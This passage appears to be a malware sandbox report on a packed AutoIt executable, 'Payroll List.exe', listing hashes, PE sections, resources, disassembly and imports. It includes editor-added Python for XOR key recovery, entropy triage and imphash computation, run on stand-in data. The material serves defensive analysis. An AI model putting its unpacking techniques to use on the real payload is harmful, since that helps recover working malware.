                                                                  Preview:..q..1JNF..[...v.JM..mQI...J1JNFODERAV4EJ1JNFODERAV4EJ1JN.ODE\^.:E.8.o.N..s.>]6jA8!!=%(r"7Z+%Ej,#o60<a?Ze.~.n+ |L[>aJ1JNFOD<SH..%-.w.!.y%5.L...*).U..}6S.P..z/#..(5\x*V.NFODERAVd.J1.OGO}. V4EJ1JNF.DGSJW?EJeNNFODERAV4.^1JNVODE"EV4E.1J^FODGRAP4EJ1JNFIDERAV4EJANNFMDERAV4GJq.NF_DEBAV4EZ1J^FODERAF4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4k>T2:FOD..EV4UJ1J.BODURAV4EJ1JNFODERaV4%J1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODERAV4EJ1JNFODE
Process:C:\Users\user\Desktop\Payroll List.exe
File Type:data
Category:dropped
Size (bytes):288256
Entropy (8bit):7.99290766412211
Encrypted:true
Malicious:false
Hashes and preview: identical to the previous dropped file (MD5 7B6C3967EE26BAC291D585DAE2BCB6FD, SHA1 7153F3FB7FEE5960A632AB6030A2CE37D4843A39, SHA-256 809BCF736D090990DC4A3A1D9FBFE97B5E2BFB9FEEF5E7F46A8AFD6DC6201AC8); the same content was written a second time.
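The 288256-byte file dropped by Payroll List.exe is flagged "Encrypted: true" on the strength of its 8-bit entropy (7.99 of a possible 8.0), yet its preview is dominated by the 13-character sequence J1JNFODERAV4E repeated back to back. A long, exactly periodic run inside an otherwise high-entropy blob is the signature of a repeating-key XOR applied over a null-filled region: zero bytes XOR the key give the key itself. The block below is an added analyst example, not Joe Sandbox code and not a claim about how this sample's packer actually works; it treats the repeating sequence as a hypothetical key and runs the recovery against a constructed stand-in payload rather than the real dropped file. Entropy is computed on the same 0 to 8 bits-per-byte scale the report uses.

```python
import math
from collections import Counter

# Constructed stand-in for an encrypted dropped payload: a PE-like header
# and DOS stub text followed by null padding, XORed with a 13-byte key.
# KEY is the sequence repeating in the report's preview; that the real
# file uses repeating-key XOR is an assumption, not something the report
# states.
KEY = b"J1JNFODERAV4E"
PLAINTEXT = (
    b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00\xff\xff\x00\x00"
    + b"This program cannot be run in DOS mode."
    + b"\x00" * 80
)


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR data with key repeated; the operation is its own inverse."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte, 0.0 to 8.0, the scale the report uses."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def find_repeating_run(buf: bytes, max_period: int = 64, min_repeats: int = 4):
    """Locate the longest region where buf[i] == buf[i + period] holds for
    consecutive i, requiring at least min_repeats periods of repetition.
    Returns (offset, period) or None. Null-filled plaintext under a
    repeating XOR key shows up as exactly this kind of run."""
    best = None  # (matched_bytes, offset, period)
    for period in range(1, max_period + 1):
        run = 0
        for i in range(len(buf) - period):
            if buf[i] != buf[i + period]:
                run = 0
                continue
            run += 1
            if run >= period * (min_repeats - 1) and (best is None or run > best[0]):
                best = (run, i - run + 1, period)
    return None if best is None else (best[1], best[2])


def recover_key(buf: bytes):
    """Read the key out of the repeating run and rotate it so that index 0
    of the returned key lines up with offset 0 of the buffer."""
    hit = find_repeating_run(buf)
    if hit is None:
        return None
    offset, period = hit
    return bytes(buf[offset + ((j - offset) % period)] for j in range(period))


def triage(buf: bytes):
    """Return (ciphertext entropy, recovered key or None, decrypted bytes or None)."""
    key = recover_key(buf)
    plain = xor_repeating(buf, key) if key else None
    return shannon_entropy(buf), key, plain


if __name__ == "__main__":
    blob = xor_repeating(PLAINTEXT, KEY)
    entropy, key, plain = triage(blob)
    print(f"entropy {entropy:.3f}, key {key!r}, header {plain[:2]!r}")
```

The practical point for a triage queue: an entropy score says nothing about key structure, so a file the sandbox marks "encrypted" can still be opened with nothing more than the bytes visible in its own hexdump preview. Against the real dropped file, run `triage` on the full 288256 bytes and check whether the decrypted output gains an MZ header or readable strings; if it does not, the repeat is coincidental or the scheme is not plain XOR, and the hypothesis should be dropped.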
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.147743818613458
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:Payroll List.exe
                                                                  File size:1'212'928 bytes
                                                                  MD5:f15d8b7a5271a52273a158ff2f642d12
                                                                  SHA1:9a6178bbf1f646d6d29d6b9cfb7cfdd415f6458a
                                                                  SHA256:9de22b2b1f7bf1727126b7d85573f62bc9c247075936ced5cf1035bc893d48d7
                                                                  SHA512:ab0e27dca67fbe8f896fa4b38d42914d613aa31a94ccc7dfadc099605506cb7fd43e7dd4be55b07fafc05fc1d7e463aa151025250be917431bd9e0c121b9e7d7
                                                                  SSDEEP:24576:Ctb20pkaCqT5TBWgNQ7aT9xXW4wiZM/T6A:PVg5tQ7aT9Vwjb5
                                                                  TLSH:7145C01373DE8361C3725273BA66B701AEBB7C2506A1F56B2FD8093DB920121525EB73
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
                                                                  Icon Hash:aaf3e3e3938382a0
                                                                  Entrypoint:0x425f74
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x673FBF94 [Thu Nov 21 23:17:40 2024 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:1
                                                                  File Version Major:5
                                                                  File Version Minor:1
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:1
                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091
                                                                  Instruction
                                                                  call 00007F072D2CD8EFh
                                                                  jmp 00007F072D2C0904h
                                                                  int3
                                                                  int3
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [esp+10h]
                                                                  mov ecx, dword ptr [esp+14h]
                                                                  mov edi, dword ptr [esp+0Ch]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
                                                                  cmp edi, esi
                                                                  jbe 00007F072D2C0A8Ah
                                                                  cmp edi, eax
                                                                  jc 00007F072D2C0DEEh
                                                                  bt dword ptr [004C0158h], 01h
                                                                  jnc 00007F072D2C0A89h
                                                                  rep movsb
                                                                  jmp 00007F072D2C0D9Ch
                                                                  cmp ecx, 00000080h
                                                                  jc 00007F072D2C0C54h
                                                                  mov eax, edi
                                                                  xor eax, esi
                                                                  test eax, 0000000Fh
                                                                  jne 00007F072D2C0A90h
                                                                  bt dword ptr [004BA370h], 01h
                                                                  jc 00007F072D2C0F60h
                                                                  bt dword ptr [004C0158h], 00000000h
                                                                  jnc 00007F072D2C0C2Dh
                                                                  test edi, 00000003h
                                                                  jne 00007F072D2C0C3Eh
                                                                  test esi, 00000003h
                                                                  jne 00007F072D2C0C1Dh
                                                                  bt edi, 02h
                                                                  jnc 00007F072D2C0A8Fh
                                                                  mov eax, dword ptr [esi]
                                                                  sub ecx, 04h
                                                                  lea esi, dword ptr [esi+04h]
                                                                  mov dword ptr [edi], eax
                                                                  lea edi, dword ptr [edi+04h]
                                                                  bt edi, 03h
                                                                  jnc 00007F072D2C0A93h
                                                                  movq xmm1, qword ptr [esi]
                                                                  sub ecx, 08h
                                                                  lea esi, dword ptr [esi+08h]
                                                                  movq qword ptr [edi], xmm1
                                                                  lea edi, dword ptr [edi+08h]
                                                                  test esi, 00000007h
                                                                  je 00007F072D2C0AE5h
                                                                  bt esi, 03h
                                                                  jnc 00007F072D2C0B38h
                                                                  movdqa xmm1, dqword ptr [esi+00h]
                                                                  Programming Language:
                                                                  • [ C ] VS2008 SP1 build 30729
                                                                  • [IMP] VS2008 SP1 build 30729
                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                  • [RES] VS2012 UPD4 build 61030
                                                                  • [LNK] VS2012 UPD4 build 61030
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb7004 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc4000 | 0x5f074 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x124000 | 0x6c4c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x8d8d0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb2730 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8d000 | 0x860 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8b54f | 0x8b600 | f437a6545e938612764dbb0a314376fc | False | 0.5699499019058296 | data | 6.680413749210956 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8d000 | 0x2cc42 | 0x2ce00 | 827ffd24759e8e420890ecf164be989e | False | 0.330464397632312 | data | 5.770192333189168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xba000 | 0x9d54 | 0x6200 | e0a519f8e3a35fae0d9c2cfd5a4bacfc | False | 0.16402264030612246 | data | 2.002691099965349 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc4000 | 0x5f074 | 0x5f200 | 565c11feacb57375a1cf48e7b038fa56 | False | 0.9325337754599211 | data | 7.905892692344075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x124000 | 0xa474 | 0xa600 | 0bc98f8631ef0bde830a7f83bb06ff08 | False | 0.5017884036144579 | data | 5.245426654116355 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc44a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc45c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc48b0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc49d8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc5880 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc6128 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc6690 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xc8c38 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xc9ce0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_STRING | 0xca148 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xca6dc | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xcad68 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xcb1f8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xcb7f4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcbe50 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcc2b8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcc410 | 0x5674b | data | | | 1.000327569799194
RT_GROUP_ICON | 0x122b5c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x122bd4 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x122be8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x122cc4 | 0x3b0 | ASCII text, with CRLF line terminators | English | Great Britain | 0.5116525423728814
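The section and resource tables carry the two static packing indicators a triage script checks first: the .rsrc section's entropy of 7.9 bits per byte, and the 0x5674b-byte RT_RCDATA resource whose ZLIB complexity is above 1.0, meaning deflate cannot shrink it at all, which is how an already-compressed or encrypted blob behaves (consistent with the compiled-AutoIt verdict in the signature list, since a compiled AutoIt script is stored as an RT_RCDATA resource). The Python below is an editor's example, not code from the report or from the sample; it computes both metrics the way a triage script would and flags buffers that look packed. The buffers are constructed stand-ins, not bytes from the sample, and the 7.0 / 0.9 thresholds are the editor's working values, not figures taken from the report.

```python
import math
import random
import zlib


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant buffer, 8.0 for
    uniformly distributed bytes. Encrypted or compressed payloads sit near 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Deflated size divided by original size, the quantity the report labels
    'ZLIB Complexity'. Code and text compress well (far below 1.0); data that is
    already compressed or encrypted comes out at or slightly above 1.0 because
    deflate can only add framing overhead to it."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def triage_blob(name, data, entropy_threshold=7.0, complexity_threshold=0.9):
    """Flag a section or resource as likely packed/encrypted. The thresholds are
    the editor's working values (assumption), not figures from the report."""
    ent = shannon_entropy(data)
    cx = zlib_complexity(data)
    return {
        "name": name,
        "entropy": round(ent, 3),
        "zlib_complexity": round(cx, 3),
        "suspicious": ent >= entropy_threshold or cx >= complexity_threshold,
    }


def _pseudo_random_bytes(n, seed=1560911):
    # Seeded so the example is reproducible; stands in for an encrypted payload.
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed stand-ins for the three kinds of blob the tables above show:
# zero-filled writable data, readable strings, and an opaque high-entropy
# resource. None of these bytes come from the sample.
SAMPLE_BLOBS = {
    ".data": bytes(64 * 1024),
    ".rdata": b"This program cannot be run in DOS mode.\r\n" * 1024,
    "RT_RCDATA": _pseudo_random_bytes(64 * 1024),
}


def triage_all(blobs=SAMPLE_BLOBS):
    return [triage_blob(name, data) for name, data in blobs.items()]


if __name__ == "__main__":
    for row in triage_all():
        print(row)
```

Entropy alone misclassifies some legitimate data (font tables, icons with many colours), which is why the compressibility ratio is worth computing alongside it: a resource that is both near 8 bits per byte and incompressible, as RT_RCDATA is here, is the stronger signal.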
DLL | Import
WSOCK32.dll | __WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll | SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
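The Import Hash given above (3d95adbf13bbe79dc24dccb401c12091) is the MD5 of this import table canonicalised the way pefile does it: each module name lower-cased with a .dll/.ocx/.sys extension stripped, joined to each lower-cased function name as module.function, and all pairs comma-joined in import-table order. The example below is the editor's, not code from the report or the sandbox, and implements that canonicalisation. It hashes only a constructed excerpt of the table, so its output is not the report's value; reproducing that needs the complete table in the binary's own import order, and pefile additionally resolves ordinal-only imports for a few well-known modules through lookup tables, which this simplified version writes as ordN. One caveat for pivoting: a compiled AutoIt script is the stock AutoIt interpreter with the script carried as a resource, so the import table, and therefore this hash, identifies the interpreter build and will match benign AutoIt executables as well as this sample.

```python
import hashlib

# Extensions pefile strips from the module name before hashing.
_STRIPPED_EXTS = (".dll", ".ocx", ".sys")


def canonical_module(dll_name: str) -> str:
    """'KERNEL32.dll' -> 'kernel32', 'PSAPI.DLL' -> 'psapi'."""
    name = dll_name.lower()
    for ext in _STRIPPED_EXTS:
        if name.endswith(ext):
            return name[: -len(ext)]
    return name


def imphash_string(imports) -> str:
    """Build the string that gets hashed. `imports` is a sequence of
    (dll_name, [function_name_or_ordinal, ...]) in import-table order.
    Ordinal-only imports are written as 'ordN' (simplification: pefile
    first tries to map known ordinals back to names)."""
    parts = []
    for dll, funcs in imports:
        mod = canonical_module(dll)
        for f in funcs:
            if isinstance(f, int):
                parts.append(f"{mod}.ord{f}")
            else:
                parts.append(f"{mod}.{f.lower()}")
    return ",".join(parts)


def imphash(imports) -> str:
    return hashlib.md5(imphash_string(imports).encode("ascii")).hexdigest()


# Constructed excerpt of the import table above, in the order the report lists
# it. Only the first few entries per module are included, so this hash is NOT
# the report's Import Hash; feed the complete, ordered table to reproduce that.
EXCERPT = [
    ("WSOCK32.dll", ["__WSAFDIsSet", "recv", "send", "setsockopt"]),
    ("VERSION.dll", ["GetFileVersionInfoW", "VerQueryValueW", "GetFileVersionInfoSizeW"]),
    ("KERNEL32.dll", ["HeapAlloc", "GetProcessHeap", "VirtualAllocEx", "WriteProcessMemory"]),
]


def same_import_profile(a, b) -> bool:
    """True when two import tables would collide on imphash, i.e. share a
    packaging/runtime profile (for AutoIt: the same interpreter build)."""
    return imphash(a) == imphash(b)


if __name__ == "__main__":
    print(imphash_string(EXCERPT))
    print(imphash(EXCERPT))
```

Because the hash is order-sensitive, two binaries built from the same interpreter with the script swapped out collide, while the same functions in a different order do not; that is the property that makes imphash useful for clustering toolchains and weak for naming families.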
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
